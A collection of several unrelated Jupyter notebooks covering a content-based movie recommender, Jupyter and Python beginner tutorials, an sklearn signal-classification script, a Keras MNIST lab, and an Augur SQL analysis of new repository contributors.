``` #Filtering out the movies from the input userMovies = moviesWithGenres_df[moviesWithGenres_df['movieId'].isin(inputMovies['movieId'].tolist())] userMovies ``` We'll only need the actual genre table, so let's clean this up a bit by resetting the index and dropping the movieId, title, genres and year columns. ``` #Resetting the index to avoid future issues userMovies = userMovies.reset_index(drop=True) #Dropping unnecessary issues due to save memory and to avoid issues userGenreTable = userMovies.drop('movieId', 1).drop('title', 1).drop('genres', 1).drop('year', 1) userGenreTable ``` Now we're ready to start learning the input's preferences! To do this, we're going to turn each genre into weights. We can do this by using the input's reviews and multiplying them into the input's genre table and then summing up the resulting table by column. This operation is actually a dot product between a matrix and a vector, so we can simply accomplish by calling Pandas's "dot" function. ``` inputMovies['rating'] #Dot produt to get weights userProfile = userGenreTable.transpose().dot(inputMovies['rating']) #The user profile userProfile ``` Now, we have the weights for every of the user's preferences. This is known as the User Profile. Using this, we can recommend movies that satisfy the user's preferences. Let's start by extracting the genre table from the original dataframe: ``` #Now let's get the genres of every movie in our original dataframe genreTable = moviesWithGenres_df.set_index(moviesWithGenres_df['movieId']) #And drop the unnecessary information genreTable = genreTable.drop('movieId', 1).drop('title', 1).drop('genres', 1).drop('year', 1) genreTable.head() genreTable.shape ``` With the input's profile and the complete list of movies and their genres in hand, we're going to take the weighted average of every movie based on the input profile and recommend the top twenty movies that most satisfy it. 
``` #Multiply the genres by the weights and then take the weighted average recommendationTable_df = ((genreTable*userProfile).sum(axis=1))/(userProfile.sum()) recommendationTable_df.head() #Sort our recommendations in descending order recommendationTable_df = recommendationTable_df.sort_values(ascending=False) #Just a peek at the values recommendationTable_df.head() ``` Now here's the recommendation table! ``` #The final recommendation table movies_df.loc[movies_df['movieId'].isin(recommendationTable_df.head(20).keys())] ``` ### Advantages and Disadvantages of Content-Based Filtering ##### Advantages * Learns user's preferences * Highly personalized for the user ##### Disadvantages * Doesn't take into account what others think of the item, so low quality item recommendations might happen * Extracting data is not always intuitive * Determining what characteristics of the item the user dislikes or likes is not always obvious ## Want to learn more? IBM SPSS Modeler is a comprehensive analytics platform that has many machine learning algorithms. It has been designed to bring predictive intelligence to decisions made by individuals, by groups, by systems – by your enterprise as a whole. A free trial is available through this course, available here: [SPSS Modeler](http://cocl.us/ML0101EN-SPSSModeler). Also, you can use Watson Studio to run these notebooks faster with bigger datasets. Watson Studio is IBM's leading cloud solution for data scientists, built by data scientists. With Jupyter notebooks, RStudio, Apache Spark and popular libraries pre-packaged in the cloud, Watson Studio enables data scientists to collaborate on their projects without having to install anything. Join the fast-growing community of Watson Studio users today with a free account at [Watson Studio](https://cocl.us/ML0101EN_DSX) ### Thanks for completing this lesson! 
Notebook created by: <a href = "https://ca.linkedin.com/in/saeedaghabozorgi">Saeed Aghabozorgi</a>, Gabriel Garcez Barros Sousa <hr> Copyright &copy; 2018 [Cognitive Class](https://cocl.us/DX0108EN_CC). This notebook and its source code are released under the terms of the [MIT License](https://bigdatauniversity.com/mit-license/).​
github_jupyter
## Jupyter Introduction The Jupyter Notebook is a web application that allows you to create and share documents that contain live code, equations, visualizations and explanatory text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, machine learning and much more. http://jupyter.org You can use arrows to move up or down to cells. You can also use your mouse to select a cell. ``` print "something" # press "alt + enter" to run this cell and generate a new cell print "something once again" # press "shift + enter" to run this cell and move to the next one (ie. without creating a new one) print "and one last time" # press "ctrl + enter" to run this cell without moving to the next cell ``` This is a **markdown**, annotation text. Select this cell and check out the **"Markdown"** label on the tool bar. Notice that when you select other cells they show **"Code"**. ``` %%bash printf "this cell is bash.\nDo you notice the different printf?" # now run this cell %load_ext rpy2.ipython # this allows us to also do R # now run this cell %%R print("This cell is R. Do you notice the '()' ?") # now run this cell ``` Go ahead and run the next cells as well. ``` # let's try something else a=1000 b=2 c=1000/2 print "result=", c s="This is a string" l=["This","is","a","list."] part_of_l=l[0:2] list_of_numbes=[2,3,4,5,6] this_is_a_dictionary={"keyA":"valueA","keyB":"valueB"} getA=this_is_a_dictionary.get("keyA") print "\ns=", s print "\nl=", l print "\npart_of_l, l[0:2]=", part_of_l print "\nAs you can see, python is 0 based:" print "\nlist_of_numbes=", list_of_numbes print "\nlist_of_numbes[0:2]=", list_of_numbes[0:2] print "\nd=", this_is_a_dictionary print "\ngetA=", getA ``` In the next cell try to print a selection of the list "l" so that it looks like this: ```python ["a","list."] ``` ``` # do it here: ``` Now try to get the value of *"keyB"* from the dictionary `this_is_a_dictionary`. 
``` # do it here: # what about if staments in python if c >= 500: print "Yes!" else: print "ohoh!" # in python you need to respect tab spacing for statments like "if" # and loops? list_of_names=["Jorge","Bouças"] for name in list_of_names: print "printing", name ``` Lets give it a try at **bash** now. In bash you can list contents of a directory with ```bash ls ``` , make directories with ```bash mkdir ``` and change directories with ```bash cd ``` . ``` %%bash ls %%bash mkdir test_dir %%bash cd test_dir ls ``` Try **Kernel** > **Restart & Clear Output** Now try **Cell** > **Run All**
github_jupyter
``` %matplotlib inline import matplotlib import matplotlib.pyplot as plt plt.rcParams['axes.titlesize'] = 26 plt.rcParams['axes.labelsize']=18 plt.rcParams['xtick.labelsize']=18 plt.rcParams['ytick.labelsize']=18 plt.rcParams['legend.fontsize']=18 plt.rcParams['lines.linewidth'] = 3 plt.rcParams['lines.markersize'] = 10 plt.rcParams['axes.labelsize'] = 22 import numpy as np import pickle from DDAS import MakeReal from AntennaSelection import generateLROASdata, generateOASdata, generateSASdata, calculateBERwithAS from symbols import SymbolGenerator, MLdecoder from channels import KroneckerRayleighChannelMIMO from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from sklearn.model_selection import cross_val_predict, cross_val_score from sklearn.ensemble import RandomForestClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.neural_network import MLPClassifier from sklearn.svm import SVC from sklearn.base import clone import re def removeSpaces(file): r = open(file, 'r') contents = r.read() contents = contents.replace(" ", "") contents = contents.replace("\t","\n") contents = contents.replace('i', 'j') string = file + "_processed.txt" o = open(string, 'w') o.write(contents) #for s in contents: # o.write(s) r.close() o.close() #removeSpaces('./classification_data/test1/test13') def readComplexFile(file): r = open(file, 'r') contents = r.read() contents = contents.split("\n") print(len(contents)) print(contents[:10]) c = np.array(len(contents)) for i in range(len(contents)): try: c[i] = complex(contents[i]) except ValueError: print(contents[i]) return c test1 = np.loadtxt('./classification_data/test1_processed.txt', dtype=complex) test11 = np.loadtxt('./classification_data/test11_processed.txt', dtype=complex) test12 = np.loadtxt('./classification_data/test12_processed.txt', dtype=complex) test13 = np.loadtxt('./classification_data/test13_processed.txt', dtype=complex) test2 = 
np.loadtxt('./classification_data/test2_processed.txt', dtype=complex) test21 = np.loadtxt('./classification_data/test21_processed.txt', dtype=complex) test22 = np.loadtxt('./classification_data/test22_processed.txt', dtype=complex) test23 = np.loadtxt('./classification_data/test23_processed.txt', dtype=complex) test3 = np.loadtxt('./classification_data/test3_processed.txt', dtype=complex) test31 = np.loadtxt('./classification_data/test31_processed.txt', dtype=complex) test32 = np.loadtxt('./classification_data/test32_processed.txt', dtype=complex) test33 = np.loadtxt('./classification_data/test33_processed.txt', dtype=complex) test4 = np.loadtxt('./classification_data/test4_processed.txt', dtype=complex) test41 = np.loadtxt('./classification_data/test41_processed.txt', dtype=complex) test42 = np.loadtxt('./classification_data/test42_processed.txt', dtype=complex) test5 = np.loadtxt('./classification_data/test5_processed.txt', dtype=complex) test51 = np.loadtxt('./classification_data/test51_processed.txt', dtype=complex) test52 = np.loadtxt('./classification_data/test52_processed.txt', dtype=complex) test6 = np.loadtxt('./classification_data/test6_processed.txt', dtype=complex) test61 = np.loadtxt('./classification_data/test61_processed.txt', dtype=complex) test62 = np.loadtxt('./classification_data/test62_processed.txt', dtype=complex) test7 = np.loadtxt('./classification_data/test7_processed.txt', dtype=complex) test71 = np.loadtxt('./classification_data/test71_processed.txt', dtype=complex) test72 = np.loadtxt('./classification_data/test72_processed.txt', dtype=complex) def breakData(x, n): l = len(x); steps = l//n s = x.shape y = np.zeros((steps,n),dtype = complex) for i in range(steps-1): y[i-(1000//n)] = x[i*n:(i+1)*n] return y def cleanData(x, Nclean, Nleave): while((i+1) < len(x)): x = x[i*Nleave:(i+1)Nleave, (i+1)Nleave + 2*Nclean: ] i += 1 N = 200 plt1 = test1 plt2 = test2 plt3 = test3 plt4 = test4 plt5 = test5 plt6 = test6 plt7 = test7 test1 = 
breakData(test1, N) test11 = breakData(test11, N) test12 = breakData(test12, N) test13 = breakData(test13, N) test2 = breakData(test2, N) test21 = breakData(test21, N) test22 = breakData(test22, N) test23 = breakData(test23, N) test3 = breakData(test3, N) test31 = breakData(test31, N) test32 = breakData(test32, N) test33 = breakData(test33, N) test4 = breakData(test4, N) test41 = breakData(test41, N) test42 = breakData(test42, N) test5 = breakData(test5, N) test51 = breakData(test51, N) test52 = breakData(test52, N) test6 = breakData(test6, N) test61 = breakData(test61, N) test62 = breakData(test62, N) test7 = breakData(test7, N) test71 = breakData(test71, N) test72 = breakData(test72, N) test72.shape data_prep_pipeline = Pipeline([ ('toReal', MakeReal(RealPart = False, ImaginaryPart=False, magnitude = True, Phase = True)), ('stdScaler', StandardScaler()), ]) x10 = data_prep_pipeline.fit_transform(test1) x11 = data_prep_pipeline.fit_transform(test11) x12 = data_prep_pipeline.fit_transform(test12) x13 = data_prep_pipeline.fit_transform(test13) x20 = data_prep_pipeline.fit_transform(test2) x21 = data_prep_pipeline.fit_transform(test21) x22 = data_prep_pipeline.fit_transform(test22) x23 = data_prep_pipeline.fit_transform(test23) x30 = data_prep_pipeline.fit_transform(test3) x31 = data_prep_pipeline.fit_transform(test31) x32 = data_prep_pipeline.fit_transform(test32) x33 = data_prep_pipeline.fit_transform(test33) x40 = data_prep_pipeline.fit_transform(test4) x41 = data_prep_pipeline.fit_transform(test41) x42 = data_prep_pipeline.fit_transform(test42) x50 = data_prep_pipeline.fit_transform(test5) x51 = data_prep_pipeline.fit_transform(test51) x52 = data_prep_pipeline.fit_transform(test52) x60 = data_prep_pipeline.fit_transform(test6) x61 = data_prep_pipeline.fit_transform(test61) x62 = data_prep_pipeline.fit_transform(test62) x70 = data_prep_pipeline.fit_transform(test7) x71 = data_prep_pipeline.fit_transform(test71) x72 = data_prep_pipeline.fit_transform(test72) del 
test1 del test11 del test12 del test13 del test2 del test21 del test22 del test23 del test3 del test31 del test32 del test33 del test4 del test41 del test42 del test5 del test51 del test52 del test6 del test61 del test62 del test7 del test71 del test72 x10.shape x10[1].shape s = x10.shape N = s[0] y10 = np.ones(N) y11 = np.ones(N) y12 = np.ones(N) y13 = np.ones(N) y20 = np.ones(N) y21 = np.ones(N) y22 = np.ones(N) y23 = np.ones(N) y30 = np.ones(N) y31 = np.ones(N) y32 = np.ones(N) y33 = np.ones(N) y40 = np.zeros(N) y41 = np.zeros(N) y42 = np.zeros(N) y50 = np.zeros(N) y51 = np.zeros(N) y52 = np.zeros(N) y60 = np.zeros(N) y61 = np.zeros(N) y62 = np.zeros(N) y70 = np.zeros(N) y71 = np.zeros(N) y72 = np.zeros(N) X = np.concatenate((x10,x11,x12,x13,x20,x21,x22,x23,x30,x31,x32,x33,x40,x41,x42,x50,x51,x52,x60,x61,x62,x70,x71,x72)) y = np.concatenate((y10,y11,y12,y13,y20,y21,y22,y23,y30,y31,y32,y33,y40,y41,y42,y50,y51,y52,y60,y61,y62,y70,y71,y72)) p = np.random.permutation(len(X)) X = X[p] y = y[p] N = 5000 Xtest = X[len(X)-N:] Xtrain = X[:len(X)-N] ytest = y[len(y)-N:] ytrain = y[:len(y)-N] del X, y mlpc_clf = MLPClassifier(max_iter=1000) mlpc_clf.fit(Xtrain,ytrain) print(mlpc_clf.score(Xtest,ytest)) svc_clf = SVC() knn_clf = KNeighborsClassifier(n_neighbors=51) knn_clf.fit(Xtrain[:10000],ytrain[:10000]) knn_clf.score(Xtest,ytest) svc_clf.fit(Xtrain[:10000], ytrain[:10000]) svc_clf.score(Xtest,ytest) start = 17000 N = 100 plt.figure(figsize=(20,15)) plt.subplot(2,1,1) plt.plot(np.abs(plt1[start:start+N])) plt.subplot(2,1,2) plt.plot(np.angle(plt1[start:start+N])) plt.show() plt.figure(figsize=(20,15)) plt.subplot(2,1,1) plt.plot(np.abs(plt2[start:start+N])) plt.subplot(2,1,2) plt.plot(np.angle(plt2[start:start+N])) plt.show() plt.figure(figsize=(20,15)) plt.subplot(2,1,1) plt.plot(np.abs(plt3[start:start+N])) plt.subplot(2,1,2) plt.plot(np.angle(plt3[start:start+N])) plt.show() plt.figure(figsize=(15,10)) plt.plot(np.abs(plt1[start:start+N]), label='Plastic Glass') 
plt.plot(np.abs(plt2[start:start+N]), label='Metallic Glass') plt.plot(np.abs(plt3[start:start+N]), label ='Glass') plt.plot(np.abs(plt4[start:start+N]),'--', label='Mirror') plt.plot(np.abs(plt5[start:start+N]),'--', label='Plastic Disc') plt.plot(np.abs(plt6[start:start+N]),'--', label = 'Book') plt.plot(np.abs(plt7[start:start+N]),'--', label ='Metal Disc') plt.legend() plt.ylabel('Magnitude') plt.xlabel('Time Samples') plt.show() plt.figure(figsize=(20,15)) plt.plot(np.angle(plt1[start:start+N]), label='Plastic Glass') plt.plot(np.angle(plt2[start:start+N]), label='Metallic Glass') plt.plot(np.angle(plt3[start:start+N]), label ='Glass') plt.plot(np.angle(plt4[start:start+N]),'--', label='Mirror') plt.plot(np.angle(plt5[start:start+N]),'--', label='Plastic Disc') plt.plot(np.angle(plt6[start:start+N]),'--', label = 'Wood') plt.plot(np.angle(plt7[start:start+N]),'--', label ='Metal Disc') plt.legend() plt.ylabel('Magnitude') plt.xlabel('Time Samples') plt.show() plt.figure(figsize=(20,15)) plt.plot(np.abs(plt1[12000:24000])) plt.show() plt.figure(figsize=(20,15)) plt.plot(np.abs(plt2[12000:24000])) plt.show() plt.figure(figsize=(20,15)) plt.plot(np.abs(plt3[12000:24000])) plt.show() ```
github_jupyter
# Introduction to Python There are several ways to run a Python script. That is true for other programming languages as well. One way is to use the Python interpreter. # Using the Python interpreter In the command line type: ```shell $ python ``` This will start a prompt that looks something like: ![](static/python_interpreter.png) The `>>>` indicates the point at which you can type Python code. Type `2 + 2` and press enter. You can see what this looks like below: ```python >>> 2 + 2 4 ``` # Creating numeric variables We can assign variables to values using the `=` operator: ```python >>> the_meaning_of_life = 42 >>> the_meaning_of_life = the_meaning_of_life + 2 >>> the_meaning_of_life 44 ``` # Creating boolean variables We can create boolean values using a number of comparison operators which include: - `==` equals - `!=` not equals - `>` strictly greater - `>=` greater than or equal ```python >>> is_42 = the_meaning_of_life == 42 >>> is_42 False >>> greater_than_42 = the_meaning_of_life > 42 >>> greater_than_42 True ``` # Creating list variables Python has an indexable structure called lists: ```python >>> numbers = [1, 2, 4, 5] >>> max(numbers) 5 >>> min(numbers) 1 >>> sum(numbers) 12 >>> numbers[0] 1 >>> numbers[-2] 4 >>> numbers.append(50) >>> numbers [1, 2, 4, 5, 50] ``` To close the Python interpreter type `exit()` at the prompt: ```python >>> exit() ``` # Using Python scripts Another way to run Python is using a script and the command line. Python scripts are used when writing more sophisticated code (software). Open the `addition.py` file (we created before) using the editor you downloaded (for example VS code) for this workshop. Edit the `addition.py` so that it looks like this: ```python print(1 + 1) ``` and save. 
While making sure you are in the `rsd-workshop`, which you can enter using the command: ```shell $ cd rsd-workshop ``` and check using: ```shell $ pwd ``` use the following command to run the Python script `addition.py`: ```shell $ python addition.py ``` # If statements Let's create another Python file called `if-statements.py`. This can be done either by using the `echo`/`touch` command or from your editor `File > New file`. Include the following code in the file: ```python N = 572 if N % 2 == 0: print("N is even") else: print("N is odd") ``` and then run it (type): ```shell $ python if-statements.py ``` **Note** white space and indentation are important in Python. The indented code block indicates what code to execute if the boolean variable `N % 2 == 0` is True. # While loops It is possible to repeat code using while loops which will repeatedly check a boolean variable. Create a file called `while-loops.py`, include the following code and run it. ```python N = 0 even_number_count = 0 while N < 10: if N % 2 == 0: even_number_count = even_number_count + 1 N += 1 print(even_number_count) ``` # Functions It is possible to create functions in Python. Open the file `addition.py` and we are going to implement a function which adds two input numbers. Your `addition.py` should look like: ```python def add_two_numbers(a, b): return a + b print(add_two_numbers(1, 3)) ``` save and run: ```shell $ python addition.py ```
github_jupyter
# Classification using the Keras Sequential API **Learning Objectives** 1. Build a neural network that classifies images. 2. Train this neural network. 3. Evaluate the accuracy of the model. ## Introduction This short introduction uses [Keras](https://keras.io/), a high-level API to build and train models in TensorFlow. In this lab, you load and prepare the MNIST dataset, convert the samples from integers to floating-point numbers, build and train a neural network that classifies images and then evaluate the accuracy of the model. Each learning objective will correspond to a __#TODO__ in the [student lab notebook](https://github.com/GoogleCloudPlatform/training-data-analyst/blob/master/courses/machine_learning/deepdive2/introduction_to_tensorflow/solutions/intro_logistic_regression_TF2.0.ipynb) -- try to complete that notebook first before reviewing this solution notebook. ## Load necessary libraries We will start by importing the necessary libraries for this lab. ``` import tensorflow as tf print("TensorFlow version: ",tf.version.VERSION) ``` Load and prepare the [MNIST dataset](http://yann.lecun.com/exdb/mnist/). Convert the samples from integers to floating-point numbers: ``` mnist = tf.keras.datasets.mnist (x_train, y_train), (x_test, y_test) = mnist.load_data() x_train, x_test = x_train / 255.0, x_test / 255.0 ``` Build the `tf.keras.Sequential` model by stacking layers. Choose an optimizer and loss function for training: ``` # TODO 1 model = tf.keras.models.Sequential([ tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dropout(0.2), tf.keras.layers.Dense(10) ]) ``` For each example the model returns a vector of "[logits](https://developers.google.com/machine-learning/glossary#logits)" or "[log-odds](https://developers.google.com/machine-learning/glossary#log-odds)" scores, one for each class. 
``` predictions = model(x_train[:1]).numpy() predictions ``` The `tf.nn.softmax` function converts these logits to "probabilities" for each class: ``` tf.nn.softmax(predictions).numpy() ``` Note: It is possible to bake this `tf.nn.softmax` in as the activation function for the last layer of the network. While this can make the model output more directly interpretable, this approach is discouraged as it's impossible to provide an exact and numerically stable loss calculation for all models when using a softmax output. The `losses.SparseCategoricalCrossentropy` loss takes a vector of logits and a `True` index and returns a scalar loss for each example. ``` loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) # TODO 2 ``` This loss is equal to the negative log probability of the true class: It is zero if the model is sure of the correct class. This untrained model gives probabilities close to random (1/10 for each class), so the initial loss should be close to `-tf.log(1/10) ~= 2.3`. ``` loss_fn(y_train[:1], predictions).numpy() model.compile(optimizer='adam', loss=loss_fn, metrics=['accuracy']) ``` The `Model.fit` method adjusts the model parameters to minimize the loss: ``` model.fit(x_train, y_train, epochs=5) ``` The `Model.evaluate` method checks the model's performance, usually on a "[Validation-set](https://developers.google.com/machine-learning/glossary#validation-set)" or "[Test-set](https://developers.google.com/machine-learning/glossary#test-set)". ``` model.evaluate(x_test, y_test, verbose=2) ``` The image classifier is now trained to ~98% accuracy on this dataset. To learn more, read the [TensorFlow tutorials](https://www.tensorflow.org/tutorials/). If you want your model to return a probability, you can wrap the trained model, and attach the softmax to it: ``` probability_model = tf.keras.Sequential([ model, tf.keras.layers.Softmax() ]) probability_model(x_test[:5]) ```
github_jupyter
# New Contributor Analysis ``` import psycopg2 import pandas as pd import sqlalchemy as salc import numpy as np import seaborn as sns import matplotlib.pyplot as plt import warnings import datetime import json warnings.filterwarnings('ignore') with open("config.json") as config_file: config = json.load(config_file) database_connection_string = 'postgres+psycopg2://{}:{}@{}:{}/{}'.format(config['user'], config['password'], config['host'], config['port'], config['database']) dbschema='augur_data' engine = salc.create_engine( database_connection_string, connect_args={'options': '-csearch_path={}'.format(dbschema)}) ``` ## Repo Filter ``` #declare all repo ids you would like to produce charts for repo_set = {25440, 25448} #can be set as 'competitors' or 'repo' #'competitors' will group graphs by type, so it is easy to compare across repos # 'repo' will group graphs by repo so it is easy to look at all the contributor data for each repo display_grouping = 'repo' #if display_grouping is set to 'competitors', enter the repo ids you do no want to alias, if 'display_grouping' is set to repo the list will not effect anything not_aliased_repos = [25440, 25448] #group_by can be set as 'month' or 'year' group_by = 'month' #requirements for a contributor to be considered a repeat contributor time = 365 num_contributions_required = 5 #specify dates for filtering #if the end_date is in the future, the end_date will default to the current_date begin_date = '2019-10-01' end_date = '2020-10-31' save_files = False #create tuple that contains all the contributor rankings needed rank_list = [] for num in range(1, num_contributions_required + 1): rank_list.append(num) rank_tuple = tuple(rank_list) ``` ## Query Contributor and Month Data ``` df = pd.DataFrame() for repo_id in repo_set: pr_query = salc.sql.text(f""" SELECT * FROM ( SELECT ID AS cntrb_id, A.created_at AS created_at, date_part('month', A.created_at::DATE) AS month, date_part('year', A.created_at::DATE) AS year, A.repo_id, 
repo_name, full_name, login, ACTION, rank() OVER ( PARTITION BY id ORDER BY A.created_at ASC ) FROM ( ( SELECT canonical_id AS ID, created_at AS created_at, repo_id, 'issue_opened' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.issues LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = issues.reporter_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE repo_id = {repo_id} AND pull_request IS NULL GROUP BY canonical_id, repo_id, issues.created_at, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT canonical_id AS ID, TO_TIMESTAMP( cmt_author_date, 'YYYY-MM-DD' ) AS created_at, repo_id, 'commit' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.commits LEFT OUTER JOIN augur_data.contributors ON cntrb_email = cmt_author_email LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE repo_id = {repo_id} GROUP BY repo_id, canonical_email, canonical_id, commits.cmt_author_date, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT message.cntrb_id AS ID, created_at AS created_at, commits.repo_id, 'commit_comment' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.commit_comment_ref, augur_data.commits, augur_data.message LEFT OUTER JOIN augur_data.contributors ON 
contributors.cntrb_id = message.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE commits.cmt_id = commit_comment_ref.cmt_id AND commits.repo_id = {repo_id} AND commit_comment_ref.msg_id = message.msg_id GROUP BY ID, commits.repo_id, commit_comment_ref.created_at, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT issue_events.cntrb_id AS ID, issue_events.created_at AS created_at, repo_id, 'issue_closed' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.issues, augur_data.issue_events LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = issue_events.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE issues.repo_id = {repo_id} AND issues.issue_id = issue_events.issue_id AND issues.pull_request IS NULL AND issue_events.cntrb_id IS NOT NULL AND ACTION = 'closed' GROUP BY issue_events.cntrb_id, repo_id, issue_events.created_at, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT pr_augur_contributor_id AS ID, pr_created_at AS created_at, repo_id, 'open_pull_request' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.pull_requests LEFT OUTER JOIN augur_data.contributors ON pull_requests.pr_augur_contributor_id = contributors.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) 
cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE pull_requests.repo_id = {repo_id} GROUP BY pull_requests.pr_augur_contributor_id, pull_requests.repo_id, pull_requests.pr_created_at, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT message.cntrb_id AS ID, msg_timestamp AS created_at, repo_id, 'pull_request_comment' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM augur_data.pull_requests, augur_data.pull_request_message_ref, augur_data.message LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = message.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE pull_requests.repo_id = {repo_id} AND pull_request_message_ref.pull_request_id = pull_requests.pull_request_id AND pull_request_message_ref.msg_id = message.msg_id GROUP BY message.cntrb_id, pull_requests.repo_id, message.msg_timestamp, contributors.cntrb_full_name, contributors.cntrb_login ) UNION ALL ( SELECT issues.reporter_id AS ID, msg_timestamp AS created_at, repo_id, 'issue_comment' AS ACTION, contributors.cntrb_full_name AS full_name, contributors.cntrb_login AS login FROM issues, issue_message_ref, message LEFT OUTER JOIN augur_data.contributors ON contributors.cntrb_id = message.cntrb_id LEFT OUTER JOIN ( SELECT DISTINCT ON ( cntrb_canonical ) cntrb_full_name, cntrb_canonical AS canonical_email, data_collection_date, cntrb_id AS canonical_id FROM augur_data.contributors WHERE 
cntrb_canonical = cntrb_email ORDER BY cntrb_canonical ) canonical_full_names ON canonical_full_names.canonical_email = contributors.cntrb_canonical WHERE issues.repo_id = {repo_id} AND issue_message_ref.msg_id = message.msg_id AND issues.issue_id = issue_message_ref.issue_id AND issues.pull_request_id = NULL GROUP BY issues.reporter_id, issues.repo_id, message.msg_timestamp, contributors.cntrb_full_name, contributors.cntrb_login ) ) A, repo WHERE ID IS NOT NULL AND A.repo_id = repo.repo_id GROUP BY A.ID, A.repo_id, A.ACTION, A.created_at, repo.repo_name, A.full_name, A.login ORDER BY cntrb_id ) b WHERE RANK IN {rank_tuple} """) df_first_repo = pd.read_sql(pr_query, con=engine) if not df.empty: df = pd.concat([df, df_first_repo]) else: # first repo df = df_first_repo #end_date = pd.to_datetime(end_date) #current_time = datetime.datetime.now() #if end_date > current_time: # end_date = current_time months_df = pd.DataFrame() #months_query makes a df of years and months, this is used to fill the months with no data in the visualizaitons months_query = salc.sql.text(f""" SELECT * FROM ( SELECT date_part( 'year', created_month :: DATE ) AS year, date_part( 'month', created_month :: DATE ) AS MONTH FROM (SELECT * FROM ( SELECT created_month :: DATE FROM generate_series (TIMESTAMP '{begin_date}', TIMESTAMP '{end_date}', INTERVAL '1 month' ) created_month ) d ) x ) y """) months_df = pd.read_sql(months_query, con=engine) display(months_df) display(df) ``` ## Remove Bots and Only Keep Actions in Actions List ``` df = df.loc[~df['full_name'].str.contains('bot', na=False)] df = df.loc[~df['login'].str.contains('bot', na=False)] ``` ## Add Date Data ``` #add yearmonths to contributor df[['month', 'year']] = df[['month', 'year']].astype(int).astype(str) df['yearmonth'] = df['month'] + '/' + df['year'] df['yearmonth'] = pd.to_datetime(df['yearmonth']) #add yearmonths to months_df months_df[['year','month']] = months_df[['year','month']].astype(float).astype(int).astype(str) 
months_df['yearmonth'] = months_df['month'] + '/' + months_df['year'] months_df['yearmonth'] = pd.to_datetime(months_df['yearmonth']) #filter months_df with begin_date and end_date, the contributor df is filtered in the visualizations months_df = months_df.set_index(months_df['yearmonth']) months_df = months_df.loc[begin_date : end_date].reset_index(drop = True) # add column with every value being one, so when the contributor df is concatenated with the months df, the filler months won't be counted in the sums df['new_contributors'] = 1 #return the quarter in yearmonth form, when given a month and year def quarters(month, year): if month >= 1 and month <=3: return '01' + '/' + year elif month >=4 and month <=6: return '04' + '/' + year elif month >= 5 and month <=9: return '07' + '/' + year elif month >= 10 and month <= 12: return '10' + '/' + year #add quarters to contributor dataframe df['month'] = df['month'].astype(int) df['quarter'] = df.apply(lambda x: quarters(x['month'], x['year']), axis=1) df['quarter'] = pd.to_datetime(df['quarter']) #add quarters to months dataframe months_df['month'] = months_df['month'].astype(int) months_df['quarter'] = months_df.apply(lambda x: quarters(x['month'], x['year']), axis=1) months_df['quarter'] = pd.to_datetime(months_df['quarter']) ``` ## Repo Aliasing ``` #create a dictionairy with a number(0-26) as the key and a letter(A-Z) as the value #this is used to alias repos when using 'competor' display grouping is specified letters = [] nums = [] alpha = 'a' for i in range(0, 26): letters.append(alpha) alpha = chr(ord(alpha) + 1) nums.append(i) letters = [x.upper() for x in letters] #create dict out of list of numbers and letters repo_alias_dict = {nums[i]: letters[i] for i in range(len(nums))} # create dict in the form {repo_id : repo_name} aliased_repos = [] repo_dict = {} count = 0 for repo_id in repo_set: #find corresponding repo name from each repo_id repo_name = df.loc[df['repo_id'] == repo_id].iloc[0]['repo_name'] 